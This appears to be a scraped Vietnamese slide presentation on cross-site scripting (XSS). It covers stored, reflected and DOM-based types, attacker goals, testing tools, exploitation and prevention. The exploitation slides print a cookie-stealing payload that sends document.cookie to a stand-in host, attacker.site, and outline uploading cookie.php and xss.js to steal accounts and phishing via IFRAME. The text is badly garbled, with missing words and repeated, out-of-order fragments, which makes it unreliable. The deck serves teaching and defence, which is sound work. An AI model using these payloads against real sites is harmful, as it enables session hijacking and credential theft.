XSS(CrossSite Scripting)Chèn vào các website động (ASP, PHP, CGI, JSP ...) những thẻ HTML hay những đoạn mã script nguy hiểm có thể gây nguy hại cho những nạn nhân sử dụng.Được viết bằng các ClientSite Script như:JavaScript,Jscript,DHTML..Không nhằm vào server.Chủ yếu tấn công vào client (user) (kiến thức kém, tò mò, an ninh lỏng lẻo)Dụ nạn nhân click vào các url kích hoạt mã độc
Kỹ thuật công XSS Người thực hiện:Nguyễn Hữu Chung Nội Dung Giới thiệu XSS Các hình thức tồn XSS Mức độ nguy hiểm XSS Mục đích mà XSS hướng tới Kiểm tra lỗi XSS Khai thác lỗi XSS Phòng chống XSS Giới thiệu XSS XSS(Cross-Site Scripting) Chèn vào website động (ASP, PHP, CGI, JSP ) thẻ HTML hay đoạn mã script nguy hiểm gây nguy hại cho nạn nhân sử dụng Được viết Client-Site Script như:JavaScript,Jscript,DHTML Không nhằm vào server Chủ yếu công vào client (user) (kiến thức kém, tò mò, an ninh lỏng lẻo) Dụ nạn nhân click vào url kích hoạt mã độc Các hình thức tồn XSS Stored XSS Reflected XSS DOM-based XSS Các hình thức tồn XSS Stored XSS Phát sinh không lọc liệu gửi lên cách đắn Kẻ công chèn đoạn script nguy hiểm vào website Mã độc lưu lại database website Các hình thức tồn XSS Stored XSS Các hình thức tồn XSS Reflected XSS Loại xuất liệu cung cấp từ web client Tìm lỗ hổng bảo mật website cách gắn đoạn mã test vào web client để web client gửi đến server chờ phản hồi web server để tìm lỗ hổng bảo mật Xảy không ý filter input (lọc sữ liệu đầu vào) từ URL website Các hình thức tồn XSS Reflected XSS Các hình thức tồn XSS DOM-based XSS Một dạng công XSS làm thay đổi cấu trúc trang web cách thay đổi cấu trúc HTML Hacker chèn đoạn script nhằm làm thay đổi giao diện mặc định trang web thành giao diện giả Người dùng vào web giả hacker thu mật người dùng Các hình thức tồn XSS DOM-based XSS Mục đích mà XSS hướng tới Cookie: Hacker lấy cookie người dùng dùng thông tin cookie để giả mạo phiên truy cập lấy thông tin nhạy cảm khác lưu cookie Keylogging: Hacker ghi lại thao tác gõ phím người dùng gửi tất thao tác gõ phím cho để thực mục đích đánh cắp thông tin nhạy cảm, lấy mật truy cập website mã số thẻ tín dụng… Phishing: Hacker thay đổi giao diện website cách thay đổi cấu trúc HTML trang web để đánh lừa người dùng Hacker tạo form đăng nhập giả nhằm lừa người dùng đăng nhập vào để đánh cắp mật Hoạt động XSS Cho phép chèn đoạn mã vào link đường dẫn, để thực thi trình duyệt người dùng Thường XSS có dạng sau: http://www.web.vn//index.php?pg=news&cat=alert(“Lỗi XSS”) Hoạt động XSS XSS Client-Side Script, đoạn mã chạy trình duyệt phía client XSS không làm ảnh hưởng đến hệ thống website nằm server Trong kĩ thuật XSS thường link mà hacker dùng mã hóa nên người dùng khó mà phát Hoạt động XSS Đây cách mã hoá(HEX) kí tự thường dùng lỗi XSS AddressBar Browser Kiểm tra lỗi XSS Dùng tool: Paros Proxy, WebInspect, Acunetix Web Vulnerability Scanner Watchfire AppScan… Kiểm tra code Kiểm tra lỗi XSS Mở Web Bắt đầu kiểm tra , định vị ô tìm kiếm login form Chèn code vào Kiểm tra lỗi XSS Kết Khai thác lỗi XSS Khai thác lỗi XSS Các cách thực 1.Lấy cookies 2.Lấy account Khai thác lỗi XSS Lấy cookies vTạo file info.txt upload lên host vTạo file cookie.php upload file lên host để lại link: http://www.vulnerable.site/welcome.cgi? name=window.open(“http://www.attacker.site/collect.cgi? cookie=”%2Bdocument.cookie) Khai thác lỗi XSS Lấy account 1.Tạo file info.txt xss.js upload lên host 2.Chúng ta để link có lời giới thiệu hay thông báo gây ý http:// hostxss.com /search.php?s="> Khai thác lỗi XSS Kẻ công dùng XSS để lừa đảo Hướng trình duyệt người dùng đến trang web mà Attacker thiết kế sẵn! Sau attacker có thông tin lỗi XSS, họ dùng IFRAME, code sau: Sau nạn nhân vào trang giả mạo kẻ đăng nhập tài khoản ,kẻ công lấy tài khoản nạn nhân Phòng chống XSS Đối với người thiết kế phát triển ứng dụng web Chỉ chấp nhận liệu hợp lệ Từ chối nhận liệu hỏng Liên tục kiểm tra lọc liệu Tạo danh sách thẻ HTML phép sử dụng, xóa bỏ thẻ , coi đoạn script đoạn trích dẫn lỗi Lọc dấu nháy đơn hay nháy kép Lọc kí tự NULL Xóa kí tự “>”, “[...]... một file info.txt và xss. js rồi upload lên host 2.Chúng ta để một link có lời giới thiệu hay thông báo gây chú ý http:// hostxss.com /search.php?s="> Khai thác lỗi XSS Kẻ tấn công dùng XSS để lừa đảo Hướng trình duyệt của người dùng đến trang web mà Attacker thiết kế sẵn! Sau khi attacker đã có thông tin về lỗi XSS, họ có thể dùng IFRAME,... của XSS Cho phép chèn các đoạn mã vào link của đường dẫn, để thực thi trên trình duyệt của người dùng Thường thì XSS có dạng như sau: http://www.web.vn//index.php?pg=news&cat=alert(“Lỗi XSS ) Hoạt động của XSS XSS là những Client-Side Script, những đoạn mã này sẽ chỉ chạy bởi trình duyệt phía client do đó XSS không làm ảnh hưởng đến hệ thống website nằm trên server Trong kĩ thuật. .. tra lỗi XSS Kết quả Khai thác lỗi XSS Khai thác lỗi XSS Các cách thực hiện 1.Lấy cookies 2.Lấy account Khai thác lỗi XSS Lấy cookies vTạo một file info.txt và upload lên host vTạo file cookie.php upload file này lên host 3 để lại một link: http://www.vulnerable.site/welcome.cgi? name=window.open(“http://www.attacker.site/collect.cgi? cookie=”%2Bdocument.cookie) Khai thác lỗi XSS Lấy... trên server Trong kĩ thuật XSS thường thì các link mà hacker dùng đều đã được mã hóa nên người dùng khó mà phát hiện ra Hoạt động của XSS Đây là cách mã hoá(HEX) các kí tự thường dùng trong lỗi XSS của thanh AddressBar của Browser Kiểm tra lỗi XSS 1 2 Dùng tool: Paros Proxy, WebInspect, Acunetix Web Vulnerability Scanner Watchfire AppScan… Kiểm tra bằng code Kiểm tra lỗi XSS 1 2 3 Mở Web Bắt đầu kiểm... code như sau: Sau khi nạn nhân vào trang giả mạo kẻ đăng nhập tài khoản ,kẻ tấn công sẽ lấy được tài khoản của nạn nhân Phòng chống XSS Đối với người thiết kế và phát triển ứng dụng web Chỉ chấp nhận những dữ liệu hợp lệ Từ chối nhận các dữ liệu hỏng Liên tục kiểm tra và lọc dữ liệu Tạo ra danh sách...Mức độ nguy hiểm của XSS Mục đích mà XSS hướng tới Cookie: Hacker có thể lấy được cookie của người dùng và dùng những thông tin trong cookie để giả mạo phiên truy cập hoặc lấy những thông tin nhạy cảm khác được lưu trong cookie... hay nháy kép Lọc kí tự NULL Xóa các kí tự “>”, “ ...Nội Dung Giới thiệu XSS Các hình thức tồn XSS Mức độ nguy hiểm XSS Mục đích mà XSS hướng tới Kiểm tra lỗi XSS Khai thác lỗi XSS Phòng chống XSS Giới thiệu XSS XSS(Cross-Site Scripting)... XSS Stored XSS Phát sinh không lọc liệu gửi lên cách đắn Kẻ công chèn đoạn script nguy hiểm vào website Mã độc lưu lại database website Các hình thức tồn XSS Stored XSS Các hình thức tồn XSS. .. input (lọc sữ liệu đầu vào) từ URL website Các hình thức tồn XSS Reflected XSS Các hình thức tồn XSS DOM-based XSS Một dạng công XSS làm thay đổi cấu trúc trang web cách thay đổi cấu trúc HTML